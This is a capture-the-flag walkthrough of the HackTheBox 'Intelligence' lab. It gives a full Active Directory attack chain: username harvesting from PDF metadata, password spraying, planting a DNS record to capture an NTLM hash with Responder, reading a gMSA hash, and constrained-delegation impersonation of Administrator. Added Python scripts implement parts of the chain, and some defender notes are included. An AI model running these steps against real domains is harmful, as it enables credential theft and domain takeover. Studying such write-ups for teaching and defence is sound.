# Intelligence

## Enumeration

~~~
ping -c 1 10.10.10.248
~~~

![](https://i.imgur.com/XlhiQJV.png)

The TTL in the reply points at a Windows host. Full TCP port sweep first, then a service scan of the open ports only:

~~~
nmap -sS --min-rate 5000 -n -Pn 10.10.10.248 -oG allPorts
~~~

![](https://i.imgur.com/30d03ZM.png)

```
┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/INTELLIGENCE]
└──╼ #nmap -sCV -sS --min-rate 5000 -n -Pn -p53,80,88,135,139,389,445,464,593,636,3268,3269 10.10.10.248 -oN targeted
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 22:07 -05
Nmap scan report for 10.10.10.248
Host is up (0.19s latency).

PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
| http-methods:
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-04-04 15:07:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2022-04-04T15:08:50+00:00; +12h00m02s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2022-04-04T15:08:48+00:00; +12h00m02s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-04T15:08:50+00:00; +12h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-04-04T15:08:48+00:00; +12h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 12h00m01s, deviation: 0s, median: 12h00m01s
| smb2-time:
|   date: 2022-04-04T15:08:11
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
```

This is a domain controller (DNS, Kerberos, LDAP, global catalog) for the domain `intelligence.htb`, hostname `dc.intelligence.htb`. Three things in the scan matter later: SMB signing is required, so NTLM relay to SMB is not an option; the DC clock is 12 hours ahead of ours, which Kerberos will reject (the tolerance is about 5 minutes), so sync the clock to the DC before any Kerberos tooling; and port 80 serves an IIS site.

~~~
whatweb http://10.10.10.248/
~~~

![](https://i.imgur.com/PUT52xl.png)

Add both the domain and the DC's FQDN to `/etc/hosts`; the Kerberos steps at the end need `dc.intelligence.htb` to resolve:

~~~
┌─[root@cr4y0-PC]─[/home/cr4y0/Desktop/HackTheBox/INTELLIGENCE]
└──╼ #echo "10.10.10.248 intelligence.htb dc.intelligence.htb" >> /etc/hosts
~~~

~~~
crackmapexec smb 10.10.10.248
~~~

![](https://i.imgur.com/DTTRxJ7.png)

Check whether a null session or a guest (random username, no password) can list shares:

~~~
smbclient -L \\\\10.10.10.248\\ -N
smbmap -H 10.10.10.248
smbmap -H 10.10.10.248 -u 'asdad'
~~~

![](https://i.imgur.com/QPvTdT9.png)

For port 389, ldapsearch or ldapdomaindump are the tools to use once we have valid credentials.
## Web

![](https://i.imgur.com/fIZYyjm.png)

The site links to documents named `/documents/YYYY-MM-DD-upload.pdf`. Brute-force the date in the file name for 2020-2022 and download everything that exists (impossible dates such as the 31st of February just return a 404 and are skipped by `wget`):

~~~
for i in {2020..2022}; do for j in {01..12}; do for k in {01..31}; do echo "http://10.10.10.248/documents/$i-$j-$k-upload.pdf"; done; done; done | xargs -n 1 -P 20 wget
~~~

![](https://i.imgur.com/0aw2n54.png)

The PDF metadata is more interesting than the content at first: the `Creator` field holds the name of the domain user who generated each file.

```
exiftool 2020-01-01-upload.pdf
exiftool 2020-01-01-upload.pdf -creator
```

![](https://i.imgur.com/C5kgbaV.png)

~~~
exiftool *.pdf | grep "Creator" | awk 'NF{print $NF}'
~~~

![](https://i.imgur.com/aLa7fUL.png)

Deduplicate the names into a user list:

~~~
exiftool *.pdf | grep "Creator" | awk 'NF{print $NF}' | sort -u > users.txt
~~~

Validate the list against Kerberos with kerbrute (user enumeration through AS-REQ pre-authentication errors, no password needed):

~~~
git clone "https://github.com/ropnop/kerbrute"
cd kerbrute/
go build .
go build -ldflags "-s -w" .
~~~

~~~
/opt/kerbrute/kerbrute userenum --dc 10.10.10.248 -d intelligence.htb users.txt
~~~

![](https://i.imgur.com/LdL4VvD.png)

With valid usernames in hand, check whether any of them has Kerberos pre-authentication disabled (AS-REP roasting):

~~~
python3 /opt/impacket/examples/GetNPUsers.py intelligence.htb/ -no-pass -usersfile users.txt
~~~

![](https://i.imgur.com/tlAykqZ.png)

Now the content of the PDFs. `pdftotext` (from poppler-utils) converts each PDF to a text file next to it:

```
pdftotext 2020-01-01-upload.pdf
```

![](https://i.imgur.com/zC7fY7a.png)

~~~
for f in *.pdf; do pdftotext "$f"; done
~~~

![](https://i.imgur.com/iZY0lDr.png)

Grep all the text for anything that looks like a credential:

~~~
cat *.txt | grep -iE "pass|user" -C 3
~~~

![](https://i.imgur.com/8p1wQ9L.png)

One document announces a default password for new accounts:

~~~
NewIntelligenceCorpUser9876
~~~

## Foothold

Spray that password across the user list over SMB (crackmapexec stops at the first valid hit):

~~~
crackmapexec smb 10.10.10.248 -u users.txt -p 'NewIntelligenceCorpUser9876'
~~~

![](https://i.imgur.com/SU5xpqV.png)

`Tiffany.Molina` still uses the default password. Look for Kerberoastable accounts with her credentials:

~~~
GetUserSPNs.py intelligence.htb/Tiffany.Molina:NewIntelligenceCorpUser9876
~~~

![](https://i.imgur.com/nlK6ilX.png)

Dump the domain over LDAP and serve the HTML output with Apache to browse it:

```
ldapdomaindump -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' 10.10.10.248
service apache2 start
```

![](https://i.imgur.com/bvBZ3r9.png)

The dump shows an account flagged `TRUSTED_TO_AUTH_FOR_DELEGATION` (constrained delegation with protocol transition). If we were `svc_int` we could try to impersonate another user against the services it is allowed to delegate to; keep that in mind for later:

![](https://i.imgur.com/MuBgat6.png)

List the shares recursively with Tiffany's credentials:

~~~
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -R
~~~

![](https://i.imgur.com/M9iIO21.png)

~~~
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --download 'Users\Tiffany.Molina\Desktop\user.txt'
~~~

![](https://i.imgur.com/R99MAXL.png)

![](https://i.imgur.com/e3M54nP.png)

The `IT` share holds a PowerShell script:

~~~
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r IT
~~~

![](https://i.imgur.com/MF0Daif.png)

~~~
smbmap -H 10.10.10.248 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' --download 'IT/downdetector.ps1'
~~~

![](https://i.imgur.com/qFTjR0U.png)

![](https://i.imgur.com/UyND01Q.png)

## Lateral movement: ADIDNS record + Responder

`downdetector.ps1` (screenshot above) is a scheduled check that walks the DNS records whose name starts with `web` and requests each one with `-UseDefaultCredentials`, i.e. it authenticates as whatever account runs the task. Since by default any authenticated user can create records in an AD-integrated DNS zone, we add an A record named `webcr4y0` that points at our machine with `dnstool.py` (from krbrelayx), and wait for the task to come to us:

~~~
python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -r webcr4y0 -a add -t A -d 10.10.14.17 10.10.10.248
~~~

![](https://i.imgur.com/5tpz6WK.png)

~~~
Responder -I tun0
~~~

![](https://i.imgur.com/qhygeQ6.png)

![](https://i.imgur.com/xtrrsdG.png)

![](https://i.imgur.com/IAAqVEZ.png)

Responder captures the Net-NTLMv2 response of `Ted.Graves` (hashcat mode 5600), which cracks to `Mr.Teddy`. Collect the domain graph with his credentials:

~~~
bloodhound-python -c All -u 'Ted.Graves' -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb
~~~

![](https://i.imgur.com/wNIqMOV.png)

![](https://i.imgur.com/EnHbTa5.png)

## Privilege escalation: gMSA password and constrained delegation

BloodHound shows that Ted.Graves can read the managed password of the group managed service account `svc_int$` (a `ReadGMSAPassword` edge). gMSADumper reads `msDS-ManagedPassword` over LDAP and prints the derived NT hash:

~~~
python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
~~~

![](https://i.imgur.com/R9cqV4P.png)

`svc_int$:::a5fd76c71109b0b483abe309fbc92ccb`

![](https://i.imgur.com/VkpP4KO.png)

This is the account with `TRUSTED_TO_AUTH_FOR_DELEGATION` seen earlier. Its `msDS-AllowedToDelegateTo` attribute tells us which SPN it may delegate to:

~~~
python3 pywerview.py get-netcomputer -u 'Ted.Graves' -t 10.10.10.248 --full-data
~~~

![](https://i.imgur.com/qacjPdh.png)

![](https://i.imgur.com/t5DoDEz.png)

`WWW/dc.intelligence.htb`

With the gMSA's NT hash, getST performs S4U2self (a ticket for Administrator to `svc_int` itself) followed by S4U2proxy (a forwardable service ticket for Administrator to `WWW/dc.intelligence.htb`). This only works because the target user is not marked "sensitive and cannot be delegated" and is not in Protected Users. Remember the 12-hour clock skew from the scan: sync your clock with the DC first or the KDC answers with `KRB_AP_ERR_SKEW`.

~~~
python3 /opt/impacket/examples/getST.py -spn WWW/dc.intelligence.htb -impersonate Administrator intelligence.htb/svc_int -hashes :a5fd76c71109b0b483abe309fbc92ccb
~~~

![](https://i.imgur.com/UeH5Zw9.png)

![](https://i.imgur.com/KiacR7K.png)

getST saves the ticket to a `.ccache` file in the current directory; export it in `KRB5CCNAME` and use it with `-k -no-pass` against the FQDN (Kerberos needs the hostname, not the IP):

~~~
python3 /opt/impacket/examples/wmiexec.py dc.intelligence.htb -k -no-pass
~~~

![](https://i.imgur.com/1LkUgzM.png)
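The user harvesting in the Web section (date brute-force, then `exiftool | grep Creator | sort -u`) condensed into one script, added here as an illustration and not part of the original writeup. It only requests calendar dates that exist, reads the `/Creator` entry of the PDF Info dictionary directly, and de-duplicates the result. `BASE_URL` is the box path; the sample PDFs and the two names in them are constructed for the demo, and `http_fetch` is only used when the script is run against the live host.

```python
import calendar
import re
from datetime import date
from urllib.error import HTTPError
from urllib.request import urlopen

# Added example (not from the writeup): the box path, plus constructed sample data.
BASE_URL = "http://10.10.10.248/documents/"


def candidate_urls(first_year, last_year):
    """All YYYY-MM-DD-upload.pdf URLs for real calendar dates (no 2021-02-30 etc.)."""
    urls = []
    for year in range(first_year, last_year + 1):
        for month in range(1, 13):
            for day in range(1, calendar.monthrange(year, month)[1] + 1):
                urls.append(f"{BASE_URL}{date(year, month, day):%Y-%m-%d}-upload.pdf")
    return urls


# /Creator (...) in the PDF Info dictionary is what exiftool reports as "Creator".
# Assumes the Info dictionary is stored uncompressed, as in these Word-generated PDFs.
_CREATOR_RE = re.compile(rb"/Creator\s*\((.*?)(?<!\\)\)", re.S)


def pdf_creator(data):
    """Return the Creator string of a PDF, or None if the file has none."""
    m = _CREATOR_RE.search(data)
    if not m:
        return None
    # PDF literal strings escape ( ) and \ with a backslash; undo that.
    return re.sub(rb"\\([()\\])", rb"\1", m.group(1)).decode("latin-1")


def usernames_from_pdfs(pdf_blobs):
    """Sorted, de-duplicated Creator values: the equivalent of `sort -u > users.txt`."""
    names = {pdf_creator(blob) for blob in pdf_blobs}
    names.discard(None)
    return sorted(names)


def harvest(first_year, last_year, fetch):
    """fetch(url) returns the PDF bytes, or None when the file does not exist."""
    blobs = (fetch(url) for url in candidate_urls(first_year, last_year))
    return usernames_from_pdfs(b for b in blobs if b)


def http_fetch(url):
    """Fetcher for the live box: a 404 simply means that date has no document."""
    try:
        with urlopen(url, timeout=10) as resp:
            return resp.read()
    except HTTPError as err:
        if err.code == 404:
            return None
        raise


def _fake_pdf(creator):
    # Constructed stand-in for a downloaded file; not data from the box.
    return (b"%PDF-1.4\n1 0 obj\n<< /Creator (" + creator.encode() +
            b") /Producer (Microsoft Word) >>\nendobj\ntrailer\n<< /Info 1 0 R >>\n%%EOF\n")


SAMPLE_PDFS = [_fake_pdf("Tiffany.Molina"), _fake_pdf("Ted.Graves"),
               _fake_pdf("Tiffany.Molina"), b"%PDF-1.4\n%%EOF\n"]


if __name__ == "__main__":
    # Against the live host this prints the same list the shell pipeline wrote to users.txt.
    print("\n".join(harvest(2020, 2022, http_fetch)))
```

Because the regex works on the raw bytes, it also catches the name when the PDF is too damaged for `pdftotext`; it will miss a `/Creator` that lives inside a compressed object stream, which exiftool would still find.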
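What the `dnstool.py` step in the lateral-movement section actually writes: an added example, not code from the writeup or from dnstool itself, that builds and parses the binary value stored in the `dnsRecord` attribute of the new `dnsNode` object. The field layout is the `dnsRecord` structure from [MS-DNSP] section 2.3.2.2; the `record_dn` helper assumes, as on this box, that the zone name equals the AD domain name. The IP, record name and serial are the ones from the writeup or constructed.

```python
import socket
import struct

# Added example (not from the writeup or dnstool.py): dnsRecord layout per [MS-DNSP] 2.3.2.2.
DNS_TYPE_A = 1
DNS_RECORD_VERSION = 5
RANK_ZONE = 0xF0  # authoritative record in a primary zone


def build_a_record(ip, serial, ttl=180):
    """dnsRecord blob for a static A record pointing at `ip`."""
    rdata = socket.inet_aton(ip)
    header = struct.pack(
        "<HHBBHL",
        len(rdata),          # DataLength
        DNS_TYPE_A,          # Type
        DNS_RECORD_VERSION,  # Version
        RANK_ZONE,           # Rank
        0,                   # Flags
        serial,              # Serial: dnstool derives this from the zone's SOA serial
    )
    ttl_be = struct.pack(">L", ttl)   # TtlSeconds is the one big-endian field
    tail = struct.pack("<LL", 0, 0)   # Reserved, TimeStamp (0 = static record, never scavenged)
    return header + ttl_be + tail + rdata


def parse_record(blob):
    """Decode a dnsRecord value back into its fields (A records also get an 'address')."""
    dlen, rtype, version, rank, flags, serial = struct.unpack_from("<HHBBHL", blob, 0)
    (ttl,) = struct.unpack_from(">L", blob, 12)
    _reserved, timestamp = struct.unpack_from("<LL", blob, 16)
    rec = {"type": rtype, "version": version, "rank": rank, "flags": flags,
           "serial": serial, "ttl": ttl, "timestamp": timestamp}
    if rtype == DNS_TYPE_A and dlen == 4:
        rec["address"] = socket.inet_ntoa(blob[24:28])
    return rec


def record_dn(name, zone):
    """DN of the dnsNode object dnstool creates (assumes zone name == AD domain name)."""
    domain_dn = ",".join(f"DC={label}" for label in zone.split("."))
    return f"DC={name},DC={zone},CN=MicrosoftDNS,DC=DomainDnsZones,{domain_dn}"


if __name__ == "__main__":
    blob = build_a_record("10.10.14.17", serial=1)  # serial is a placeholder here
    print(record_dn("webcr4y0", "intelligence.htb"))
    print(blob.hex())
    print(parse_record(blob))
```

Two details worth knowing from the defender's side: the object is created under `DomainDnsZones`, where Authenticated Users can add children by default, so the write is not an ACL misconfiguration but a default; and a `TimeStamp` of 0 marks the record as static, so aging/scavenging will never remove it, which is also what makes new static records with unexpected owners easy to audit for.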
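The conditions the `getST -impersonate` step depends on, as an added offline check (not from the writeup or Impacket) over account attributes in the shape pywerview or ldapdomaindump return them. The `userAccountControl` bit values are the documented ones; the three sample objects are constructed to look like `svc_int$` and `Administrator` on this box, not dumped from it. `alternate_spns` goes one step beyond the writeup: it lists the other SPNs on the same host that a ticket for `WWW/dc.intelligence.htb` can be rewritten to client-side (Impacket's `getST -altservice`, Rubeus `/altservice`), which works because the service name sits in the unencrypted part of the ticket.

```python
# Added example (not from the writeup): S4U2self + S4U2proxy feasibility check.
UF_NORMAL_ACCOUNT = 0x00000200
UF_WORKSTATION_TRUST_ACCOUNT = 0x00001000
UF_NOT_DELEGATED = 0x00100000                   # "Account is sensitive and cannot be delegated"
UF_TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # constrained delegation with protocol transition


def can_impersonate(service, user, target_spn, protected_users=frozenset()):
    """Can `service` get a ticket for `target_spn` as `user` via S4U2self + S4U2proxy?

    Returns (ok, reason) and mirrors the KDC's checks: protocol transition on the
    service account, the exact SPN present in msDS-AllowedToDelegateTo, and a target
    user who is allowed to be delegated.
    """
    uac = service["userAccountControl"]
    if not uac & UF_TRUSTED_TO_AUTH_FOR_DELEGATION:
        return False, "no TRUSTED_TO_AUTH_FOR_DELEGATION: the S4U2self ticket is not forwardable"
    allowed = {spn.lower() for spn in service.get("msDS-AllowedToDelegateTo", [])}
    if target_spn.lower() not in allowed:
        return False, f"{target_spn} is not in msDS-AllowedToDelegateTo"
    name = user["sAMAccountName"]
    if user["userAccountControl"] & UF_NOT_DELEGATED:
        return False, f"{name} is marked sensitive and cannot be delegated"
    if name.lower() in {p.lower() for p in protected_users}:
        return False, f"{name} is in Protected Users"
    return True, f"S4U2self as {name}, then S4U2proxy to {target_spn}"


def alternate_spns(allowed_spn, service_classes):
    """SPNs on the same host reachable by rewriting the service class of the ticket.

    Only the host part is bound to a key; the sname is in the cleartext part of the
    ticket, so WWW/host can be presented as CIFS/host, HOST/host, ... to that host.
    """
    host = allowed_spn.split("/", 1)[1]
    return [f"{cls}/{host}" for cls in service_classes]


# Constructed sample objects shaped like LDAP results from the box.
SVC_INT = {
    "sAMAccountName": "svc_int$",
    "userAccountControl": UF_WORKSTATION_TRUST_ACCOUNT | UF_TRUSTED_TO_AUTH_FOR_DELEGATION,
    "msDS-AllowedToDelegateTo": ["WWW/dc.intelligence.htb"],
}
SVC_NO_PT = dict(SVC_INT, userAccountControl=UF_WORKSTATION_TRUST_ACCOUNT)
ADMINISTRATOR = {"sAMAccountName": "Administrator", "userAccountControl": UF_NORMAL_ACCOUNT}
SENSITIVE_ADMIN = {"sAMAccountName": "Administrator",
                   "userAccountControl": UF_NORMAL_ACCOUNT | UF_NOT_DELEGATED}


if __name__ == "__main__":
    print(can_impersonate(SVC_INT, ADMINISTRATOR, "WWW/dc.intelligence.htb"))
    print(can_impersonate(SVC_INT, SENSITIVE_ADMIN, "WWW/dc.intelligence.htb"))
    print(alternate_spns("WWW/dc.intelligence.htb", ["CIFS", "HOST", "LDAP"]))
```

The two negative branches on the user object are the cheap fixes for this escalation path: setting "Account is sensitive and cannot be delegated" on administrative accounts, or putting them in Protected Users, makes the S4U2self ticket non-forwardable and the S4U2proxy request fails, even though `svc_int$` keeps its delegation rights.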